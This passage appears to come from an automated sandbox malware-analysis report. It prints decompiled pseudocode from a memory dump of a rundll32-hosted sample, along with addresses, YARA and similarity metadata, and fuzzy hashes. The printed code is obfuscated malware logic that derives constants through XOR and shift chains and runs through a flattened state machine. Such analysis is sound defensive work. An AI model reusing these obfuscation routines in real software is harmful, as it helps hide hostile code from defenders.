						_t101 = 0;
						 *((short*)(_t95 + 2)) = 0;
					}
					L6:
					E007ADB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
				}
				return _v44;
			}




















                                                                                                                          0x0079ee8a
                                                                                                                          0x0079ee96
                                                                                                                          0x0079ee99
                                                                                                                          0x0079ee9c
                                                                                                                          0x0079ee9f
                                                                                                                          0x0079eea6
                                                                                                                          0x0079eead
                                                                                                                          0x0079eeb4
                                                                                                                          0x0079eebb
                                                                                                                          0x0079eec2
                                                                                                                          0x0079eec9
                                                                                                                          0x0079eed0
                                                                                                                          0x0079eed7
                                                                                                                          0x0079eede
                                                                                                                          0x0079eee5
                                                                                                                          0x0079eef1
                                                                                                                          0x0079eef6
                                                                                                                          0x0079eefb
                                                                                                                          0x0079ef02
                                                                                                                          0x0079ef09
                                                                                                                          0x0079ef10
                                                                                                                          0x0079ef17
                                                                                                                          0x0079ef21
                                                                                                                          0x0079ef2a
                                                                                                                          0x0079ef2d
                                                                                                                          0x0079ef34
                                                                                                                          0x0079ef3b
                                                                                                                          0x0079ef48
                                                                                                                          0x0079ef4f
                                                                                                                          0x0079ef56
                                                                                                                          0x0079ef5d
                                                                                                                          0x0079ef64
                                                                                                                          0x0079ef6b
                                                                                                                          0x0079ef72
                                                                                                                          0x0079ef76
                                                                                                                          0x0079ef7d
                                                                                                                          0x0079ef84
                                                                                                                          0x0079ef8b
                                                                                                                          0x0079ef8f
                                                                                                                          0x0079efa0
                                                                                                                          0x0079efad
                                                                                                                          0x0079efaf
                                                                                                                          0x0079efbc
                                                                                                                          0x0079efbe
                                                                                                                          0x0079efc4
                                                                                                                          0x0079efca
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079efcc
                                                                                                                          0x00000000
                                                                                                                          0x0079efca
                                                                                                                          0x0079efce
                                                                                                                          0x0079efd0
                                                                                                                          0x0079efd0
                                                                                                                          0x0079efd4
                                                                                                                          0x0079eff2
                                                                                                                          0x0079eff7
                                                                                                                          0x0079f001

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: C>"h$br8
                                                                                                                          • API String ID: 0-573140060
                                                                                                                          • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                          • Instruction ID: 7ce2ce72603691c2669155e973e8efaa217506894886ec9f76cd352817f6b043
                                                                                                                          • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                          • Instruction Fuzzy Hash: 8041F271C0121DEBCF58CFE4D94A5EEBBB5FB04304F20819AE515B6260E3B45A55CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007AAA30 Relevance: 2.6, Strings: 2, Instructions: 67COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007AAA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t83;
				signed int _t85;
				signed int _t91;

				_v40 = _v40 & 0x00000000;
				_v48 = 0xea50c7;
				_v44 = 0x183406;
				_v8 = 0x4cb37c;
				_v8 = _v8 + 0xc736;
				_v8 = _v8 + 0xd4a7;
				_t91 = __edx;
				_t85 = 0x64;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 ^ 0x0dcd94f9;
				_v24 = 0x238f3e;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x011b8be3;
				_v20 = 0x73abc8;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x00035013;
				_v16 = 0x5012b6;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000aff4c;
				_v12 = 0x8c34bb;
				_v12 = _v12 | 0x8c5a3f77;
				_v12 = _v12 + 0xffff11fb;
				_v12 = _v12 ^ 0x2d4fbea1;
				_v12 = _v12 ^ 0xa19c1e56;
				_v36 = 0xff820a;
				_v36 = _v36 | 0x4fe4a4bc;
				_v36 = _v36 ^ 0x4ffdd4f4;
				_v32 = 0x36506a;
				_v32 = _v32 + 0x4de;
				_v32 = _v32 ^ 0x003709b9;
				_v28 = 0x64fd3b;
				_v28 = _v28 + 0xffff3e7a;
				_v28 = _v28 ^ 0x00656766;
				if( *((intOrPtr*)(0x7b3210 + __edx * 4)) == 0) {
					_t83 = E007A0A0E(_t85, _t85, _a4);
					_push(_v28);
					_push(_a12);
					_push(_v32);
					_push(_t83);
					 *((intOrPtr*)(0x7b3210 + _t91 * 4)) = E0079CDCD(_v12, _v36);
				}
				return  *((intOrPtr*)(0x7b3210 + _t91 * 4));
			}

















                                                                                                                          0x007aaa36
                                                                                                                          0x007aaa3a
                                                                                                                          0x007aaa41
                                                                                                                          0x007aaa48
                                                                                                                          0x007aaa4f
                                                                                                                          0x007aaa56
                                                                                                                          0x007aaa62
                                                                                                                          0x007aaa68
                                                                                                                          0x007aaa69
                                                                                                                          0x007aaa6c
                                                                                                                          0x007aaa73
                                                                                                                          0x007aaa7a
                                                                                                                          0x007aaa7e
                                                                                                                          0x007aaa85
                                                                                                                          0x007aaa8c
                                                                                                                          0x007aaa90
                                                                                                                          0x007aaa97
                                                                                                                          0x007aaa9e
                                                                                                                          0x007aaaa7
                                                                                                                          0x007aaaaa
                                                                                                                          0x007aaab1
                                                                                                                          0x007aaab8
                                                                                                                          0x007aaabf
                                                                                                                          0x007aaac6
                                                                                                                          0x007aaacd
                                                                                                                          0x007aaad4
                                                                                                                          0x007aaadb
                                                                                                                          0x007aaae2
                                                                                                                          0x007aaae9
                                                                                                                          0x007aaaf0
                                                                                                                          0x007aaaf7
                                                                                                                          0x007aaafe
                                                                                                                          0x007aab05
                                                                                                                          0x007aab0c
                                                                                                                          0x007aab1b
                                                                                                                          0x007aab2e
                                                                                                                          0x007aab33
                                                                                                                          0x007aab36
                                                                                                                          0x007aab39
                                                                                                                          0x007aab42
                                                                                                                          0x007aab4b
                                                                                                                          0x007aab4b
                                                                                                                          0x007aab5d

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: fge$jP6
                                                                                                                          • API String ID: 0-775479084
                                                                                                                          • Opcode ID: 7c7c1042f83724c588581aba1f66b35de7d1e9d05b401af0a62442b1cec21573
                                                                                                                          • Instruction ID: c2136352cef944937c7751ba1301c57875111564e7230259600b31e3cb73a0bd
                                                                                                                          • Opcode Fuzzy Hash: 7c7c1042f83724c588581aba1f66b35de7d1e9d05b401af0a62442b1cec21573
                                                                                                                          • Instruction Fuzzy Hash: 1231EFB1C0020DEBCF08CFA4CA4A9EEBBB5FB09308F108148D511B6220C3B95B49CF95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007B0E3A Relevance: 2.6, Strings: 2, Instructions: 61COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E007B0E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				intOrPtr _t66;
				void* _t73;
				intOrPtr* _t74;

				_t74 = _a16;
				_push(_t74);
				_push(_a12);
				_t73 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007A20B9(_t61);
				_v16 = 0x2b4f5d;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000abada;
				_v24 = 0x6f176d;
				_v24 = _v24 | 0x8892b5fd;
				_v24 = _v24 ^ 0x88fd6dba;
				_v12 = 0x9049ef;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x7aa47b64;
				_v12 = _v12 ^ 0x7aa68413;
				_a16 = 0x9c064;
				_a16 = _a16 + 0x4e6a;
				_a16 = _a16 + 0xffffd44e;
				_a16 = _a16 | 0x475ceb65;
				_a16 = _a16 ^ 0x47532e3d;
				_v8 = 0xaf6c6f;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xad29;
				_v8 = _v8 + 0xd52;
				_v8 = _v8 ^ 0x000b7d9e;
				_v20 = 0xd79f7b;
				_v20 = _v20 ^ 0x214a9efd;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x010f9d8f;
				E007A0DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
				E0079ED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
				_t66 =  *((intOrPtr*)(_t74 + 4));
				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
				return _t66;
			}












                                                                                                                          0x007b0e41
                                                                                                                          0x007b0e45
                                                                                                                          0x007b0e46
                                                                                                                          0x007b0e49
                                                                                                                          0x007b0e4b
                                                                                                                          0x007b0e4e
                                                                                                                          0x007b0e52
                                                                                                                          0x007b0e53
                                                                                                                          0x007b0e58
                                                                                                                          0x007b0e65
                                                                                                                          0x007b0e68
                                                                                                                          0x007b0e6c
                                                                                                                          0x007b0e73
                                                                                                                          0x007b0e7a
                                                                                                                          0x007b0e81
                                                                                                                          0x007b0e88
                                                                                                                          0x007b0e8f
                                                                                                                          0x007b0e93
                                                                                                                          0x007b0e9a
                                                                                                                          0x007b0ea1
                                                                                                                          0x007b0ea8
                                                                                                                          0x007b0eaf
                                                                                                                          0x007b0eb6
                                                                                                                          0x007b0ebd
                                                                                                                          0x007b0ec4
                                                                                                                          0x007b0ecb
                                                                                                                          0x007b0ecf
                                                                                                                          0x007b0ed6
                                                                                                                          0x007b0edd
                                                                                                                          0x007b0ee4
                                                                                                                          0x007b0eeb
                                                                                                                          0x007b0ef2
                                                                                                                          0x007b0ef6
                                                                                                                          0x007b0f0c
                                                                                                                          0x007b0f1f
                                                                                                                          0x007b0f24
                                                                                                                          0x007b0f2a
                                                                                                                          0x007b0f32

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: =.SG$]O+
                                                                                                                          • API String ID: 0-348654084
                                                                                                                          • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                          • Instruction ID: b3c280fc341761f5376a9cbf3fb6e460f1e4de5e39216b399ede4d7ed358cceb
                                                                                                                          • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                          • Instruction Fuzzy Hash: B621277180120DEFCF45DFE4DA4A4AEBBB1FF45304F108559E91562225C3759B24DFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 431132790-0
                                                                                                                          • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                          • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                          • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                          • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A044F Relevance: 1.5, Strings: 1, Instructions: 287COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E007A044F() {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t309;
				intOrPtr _t310;
				void* _t311;
				intOrPtr _t321;
				intOrPtr _t325;
				void* _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr _t369;
				void* _t373;
				intOrPtr _t374;
				void* _t379;
				signed int* _t383;

				_t383 =  &_v140;
				_v16 = 0x8f0e94;
				_v12 = 0x9bdfd3;
				_t329 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_v68 = 0xf0a33d;
				_v68 = _v68 ^ 0x64690d06;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x00c9335c;
				_v96 = 0x45a6c;
				_v96 = _v96 + 0xffff2947;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x00000003;
				_v56 = 0xab09eb;
				_v56 = _v56 | 0x7e070137;
				_v56 = _v56 ^ 0x7eaf09ff;
				_v80 = 0xa0f766;
				_v80 = _v80 | 0xafeefcb7;
				_v80 = _v80 ^ 0xafeefff7;
				_v48 = 0xf26de0;
				_v48 = _v48 + 0xffff1ff1;
				_v48 = _v48 ^ 0x00f18dd1;
				_v76 = 0x20d89d;
				_v76 = _v76 + 0xffff51c8;
				_v76 = _v76 | 0xd50d8457;
				_v76 = _v76 ^ 0xd52cfd33;
				_v136 = 0x1fce72;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 | 0xd51e44d2;
				_t331 = 7;
				_v136 = _v136 / _t331;
				_v136 = _v136 ^ 0x1e7b1fff;
				_t379 = 0x1e2498b;
				_v92 = 0x2fa0bb;
				_v92 = _v92 >> 7;
				_v92 = _v92 << 1;
				_v92 = _v92 ^ 0x0000a534;
				_v52 = 0x3913b;
				_t332 = 0x4f;
				_v52 = _v52 / _t332;
				_v52 = _v52 ^ 0x00068b65;
				_v104 = 0xfffd78;
				_v104 = _v104 | 0x3b05e9e1;
				_v104 = _v104 + 0x741e;
				_v104 = _v104 ^ 0x7591a7da;
				_v104 = _v104 ^ 0x4990882f;
				_v84 = 0xe3d15a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0xbeb387df;
				_v84 = _v84 ^ 0x5d62ae1e;
				_v24 = 0xb3d42d;
				_v24 = _v24 | 0x6ee5a57e;
				_v24 = _v24 ^ 0x6efe8c67;
				_v60 = 0x6708ad;
				_v60 = _v60 + 0xd3fd;
				_v60 = _v60 ^ 0x0061923e;
				_v128 = 0x5551d4;
				_t333 = 0x50;
				_v128 = _v128 / _t333;
				_t334 = 0x7a;
				_v128 = _v128 / _t334;
				_t335 = 0x7e;
				_v128 = _v128 * 0x46;
				_v128 = _v128 ^ 0x000c63e9;
				_v28 = 0xd668f8;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x68f34519;
				_v112 = 0x194a18;
				_v112 = _v112 / _t335;
				_v112 = _v112 | 0xa7c33fbe;
				_t336 = 0x65;
				_v112 = _v112 / _t336;
				_v112 = _v112 ^ 0x01a285cf;
				_v44 = 0xc79794;
				_v44 = _v44 ^ 0x35aba003;
				_v44 = _v44 ^ 0x356e5b19;
				_v140 = 0x380362;
				_t337 = 0x79;
				_v140 = _v140 * 5;
				_v140 = _v140 ^ 0x1d7b2daf;
				_v140 = _v140 + 0x590f;
				_v140 = _v140 ^ 0x1c6cd8ab;
				_v120 = 0x1c8328;
				_v120 = _v120 / _t337;
				_t338 = 0xa;
				_v120 = _v120 / _t338;
				_v120 = _v120 | 0x9d020d0f;
				_v120 = _v120 ^ 0x9d02076d;
				_v124 = 0x55cbd6;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 >> 6;
				_v124 = _v124 ^ 0x000fb83a;
				_v132 = 0xf0ac8c;
				_v132 = _v132 | 0x3804c269;
				_v132 = _v132 >> 1;
				_v132 = _v132 + 0xffff8da8;
				_v132 = _v132 ^ 0x1c781e64;
				_v88 = 0x7992e8;
				_v88 = _v88 | 0xba3027fa;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x0051fda0;
				_v36 = 0x7aefbd;
				_v36 = _v36 + 0xfffff4eb;
				_v36 = _v36 ^ 0x0078a7fc;
				_v40 = 0xf56b46;
				_v40 = _v40 + 0xffff9ce0;
				_v40 = _v40 ^ 0x00fe48d4;
				_v108 = 0x27569f;
				_v108 = _v108 + 0x2c0a;
				_v108 = _v108 ^ 0xb442ac8c;
				_v108 = _v108 ^ 0xdc856b2a;
				_v108 = _v108 ^ 0x68e3c0da;
				_v116 = 0xbcba21;
				_v116 = _v116 << 0xd;
				_v116 = _v116 << 8;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x011b605a;
				_v32 = 0x87c31e;
				_v32 = _v32 ^ 0x05bc26b1;
				_v32 = _v32 ^ 0x05363b16;
				_v100 = 0x4be1cd;
				_v100 = _v100 + 0xffff13dd;
				_v100 = _v100 | 0xdbf19b4f;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x01b90151;
				_v64 = 0xb1223e;
				_v64 = _v64 | 0xb1fef6fe;
				_v64 = _v64 ^ 0xb1f65c82;
				_v72 = 0x9ef2a7;
				_v72 = _v72 * 0x66;
				_v72 = _v72 + 0xffffefd1;
				_v72 = _v72 ^ 0x3f51caaf;
				while(1) {
					L1:
					while(1) {
						_t309 = 0x546d98;
						do {
							L3:
							if(_t379 == _t309) {
								_t310 =  *0x7b3e00; // 0x0
								_t339 = _v56;
								_t311 = E007A0DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
								_t383 =  &(_t383[6]);
								__eflags = _t311 - _v80;
								if(__eflags != 0) {
									_t379 = 0x64eb485;
									goto L14;
								} else {
									_t379 = 0xb6ab68a;
									_t329 = 1;
									goto L1;
								}
							} else {
								if(_t379 == 0x19763e8) {
									_push(_v128);
									_push(_v60);
									__eflags = E00799462(E007ADCF7(_v24, 0x7917f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
									_t339 = _v140;
									_t379 =  ==  ? 0x546d98 : 0x64eb485;
									E0079A8B0(_t339, _t313, _v120);
									_t383 =  &(_t383[8]);
									L14:
									_t369 =  *0x7b3e00; // 0x0
									_t309 = 0x546d98;
									goto L15;
								} else {
									if(_t379 == 0x1e2498b) {
										_push(_t339);
										_push(_t339);
										_t373 = 0x28;
										_t321 = E00797FF2(_t373);
										 *0x7b3e00 = _t321;
										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
										_t374 =  *0x7b3e00; // 0x0
										_t325 = E00797FF2( *((intOrPtr*)(_t374 + 0x14)));
										_t369 =  *0x7b3e00; // 0x0
										_t379 = 0x19763e8;
										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
										 *(_t369 + 4) = _t339;
										_t309 = 0x546d98;
										continue;
									} else {
										if(_t379 == 0x64eb485) {
											E007A8519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
											E007A8519(_v64, _v72,  *0x7b3e00);
										} else {
											if(_t379 != 0xb6ab68a) {
												goto L15;
											} else {
												E0079957D(_v20, _v40, _v108, _v48, _v116);
											}
										}
									}
								}
							}
							L18:
							return _t329;
							L15:
							__eflags = _t379 - 0xfde45c5;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}


























































                                                                                                                          0x007a044f
                                                                                                                          0x007a0459
                                                                                                                          0x007a0466
                                                                                                                          0x007a0471
                                                                                                                          0x007a0473
                                                                                                                          0x007a047a
                                                                                                                          0x007a0481
                                                                                                                          0x007a0489
                                                                                                                          0x007a0491
                                                                                                                          0x007a0496
                                                                                                                          0x007a049e
                                                                                                                          0x007a04a6
                                                                                                                          0x007a04ae
                                                                                                                          0x007a04b3
                                                                                                                          0x007a04b8
                                                                                                                          0x007a04c0
                                                                                                                          0x007a04c8
                                                                                                                          0x007a04d0
                                                                                                                          0x007a04d8
                                                                                                                          0x007a04e0
                                                                                                                          0x007a04e8
                                                                                                                          0x007a04f0
                                                                                                                          0x007a04f8
                                                                                                                          0x007a0500
                                                                                                                          0x007a0508
                                                                                                                          0x007a0510
                                                                                                                          0x007a0518
                                                                                                                          0x007a0520
                                                                                                                          0x007a0528
                                                                                                                          0x007a052d
                                                                                                                          0x007a053b
                                                                                                                          0x007a0540
                                                                                                                          0x007a0546
                                                                                                                          0x007a054e
                                                                                                                          0x007a0553
                                                                                                                          0x007a055b
                                                                                                                          0x007a0560
                                                                                                                          0x007a0564
                                                                                                                          0x007a056c
                                                                                                                          0x007a0578
                                                                                                                          0x007a057d
                                                                                                                          0x007a0583
                                                                                                                          0x007a058b
                                                                                                                          0x007a0593
                                                                                                                          0x007a059b
                                                                                                                          0x007a05a3
                                                                                                                          0x007a05ab
                                                                                                                          0x007a05b3
                                                                                                                          0x007a05bb
                                                                                                                          0x007a05c0
                                                                                                                          0x007a05c8
                                                                                                                          0x007a05d0
                                                                                                                          0x007a05db
                                                                                                                          0x007a05e6
                                                                                                                          0x007a05f1
                                                                                                                          0x007a05f9
                                                                                                                          0x007a0601
                                                                                                                          0x007a0609
                                                                                                                          0x007a0615
                                                                                                                          0x007a061a
                                                                                                                          0x007a0624
                                                                                                                          0x007a0627
                                                                                                                          0x007a0634
                                                                                                                          0x007a0637
                                                                                                                          0x007a063b
                                                                                                                          0x007a0643
                                                                                                                          0x007a064e
                                                                                                                          0x007a0656
                                                                                                                          0x007a0661
                                                                                                                          0x007a0671
                                                                                                                          0x007a0675
                                                                                                                          0x007a0681
                                                                                                                          0x007a0686
                                                                                                                          0x007a068c
                                                                                                                          0x007a0694
                                                                                                                          0x007a069c
                                                                                                                          0x007a06a4
                                                                                                                          0x007a06ac
                                                                                                                          0x007a06b9
                                                                                                                          0x007a06bc
                                                                                                                          0x007a06c0
                                                                                                                          0x007a06c8
                                                                                                                          0x007a06d0
                                                                                                                          0x007a06d8
                                                                                                                          0x007a06e8
                                                                                                                          0x007a06f0
                                                                                                                          0x007a06f3
                                                                                                                          0x007a06f7
                                                                                                                          0x007a06ff
                                                                                                                          0x007a0707
                                                                                                                          0x007a070f
                                                                                                                          0x007a0714
                                                                                                                          0x007a0719
                                                                                                                          0x007a071e
                                                                                                                          0x007a0726
                                                                                                                          0x007a072e
                                                                                                                          0x007a0736
                                                                                                                          0x007a073a
                                                                                                                          0x007a0742
                                                                                                                          0x007a074a
                                                                                                                          0x007a0752
                                                                                                                          0x007a075a
                                                                                                                          0x007a075f
                                                                                                                          0x007a0767
                                                                                                                          0x007a076f
                                                                                                                          0x007a0777
                                                                                                                          0x007a077f
                                                                                                                          0x007a0787
                                                                                                                          0x007a078f
                                                                                                                          0x007a0797
                                                                                                                          0x007a079f
                                                                                                                          0x007a07a7
                                                                                                                          0x007a07af
                                                                                                                          0x007a07b7
                                                                                                                          0x007a07bf
                                                                                                                          0x007a07c7
                                                                                                                          0x007a07cc
                                                                                                                          0x007a07d1
                                                                                                                          0x007a07d6
                                                                                                                          0x007a07de
                                                                                                                          0x007a07e6
                                                                                                                          0x007a07ee
                                                                                                                          0x007a07f6
                                                                                                                          0x007a07fe
                                                                                                                          0x007a0806
                                                                                                                          0x007a080e
                                                                                                                          0x007a0818
                                                                                                                          0x007a0820
                                                                                                                          0x007a0828
                                                                                                                          0x007a0830
                                                                                                                          0x007a0838
                                                                                                                          0x007a0845
                                                                                                                          0x007a0849
                                                                                                                          0x007a0851
                                                                                                                          0x007a0859
                                                                                                                          0x007a0859
                                                                                                                          0x007a085f
                                                                                                                          0x007a085f
                                                                                                                          0x007a0864
                                                                                                                          0x007a0864
                                                                                                                          0x007a0866
                                                                                                                          0x007a0985
                                                                                                                          0x007a099f
                                                                                                                          0x007a09a3
                                                                                                                          0x007a09a8
                                                                                                                          0x007a09ab
                                                                                                                          0x007a09af
                                                                                                                          0x007a09be
                                                                                                                          0x00000000
                                                                                                                          0x007a09b1
                                                                                                                          0x007a09b3
                                                                                                                          0x007a09b8
                                                                                                                          0x00000000
                                                                                                                          0x007a09b8
                                                                                                                          0x007a086c
                                                                                                                          0x007a0872
                                                                                                                          0x007a091a
                                                                                                                          0x007a0923
                                                                                                                          0x007a0963
                                                                                                                          0x007a0967
                                                                                                                          0x007a0970
                                                                                                                          0x007a0973
                                                                                                                          0x007a0978
                                                                                                                          0x007a09c0
                                                                                                                          0x007a09c0
                                                                                                                          0x007a09c6
                                                                                                                          0x00000000
                                                                                                                          0x007a0878
                                                                                                                          0x007a087e
                                                                                                                          0x007a08c7
                                                                                                                          0x007a08c8
                                                                                                                          0x007a08cb
                                                                                                                          0x007a08cc
                                                                                                                          0x007a08d1
                                                                                                                          0x007a08d6
                                                                                                                          0x007a08e9
                                                                                                                          0x007a08f2
                                                                                                                          0x007a08f7
                                                                                                                          0x007a08fd
                                                                                                                          0x007a0907
                                                                                                                          0x007a0909
                                                                                                                          0x007a090c
                                                                                                                          0x007a090f
                                                                                                                          0x007a0912
                                                                                                                          0x007a085f
                                                                                                                          0x00000000
                                                                                                                          0x007a0880
                                                                                                                          0x007a0882
                                                                                                                          0x007a09e7
                                                                                                                          0x007a09fa
                                                                                                                          0x007a0888
                                                                                                                          0x007a088e
                                                                                                                          0x00000000
                                                                                                                          0x007a0894
                                                                                                                          0x007a08ae
                                                                                                                          0x007a08b3
                                                                                                                          0x007a088e
                                                                                                                          0x007a0882
                                                                                                                          0x007a087e
                                                                                                                          0x007a0872
                                                                                                                          0x007a0a04
                                                                                                                          0x007a0a0d
                                                                                                                          0x007a09cb
                                                                                                                          0x007a09cb
                                                                                                                          0x007a09cb
                                                                                                                          0x00000000
                                                                                                                          0x007a09d7
                                                                                                                          0x007a085f

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
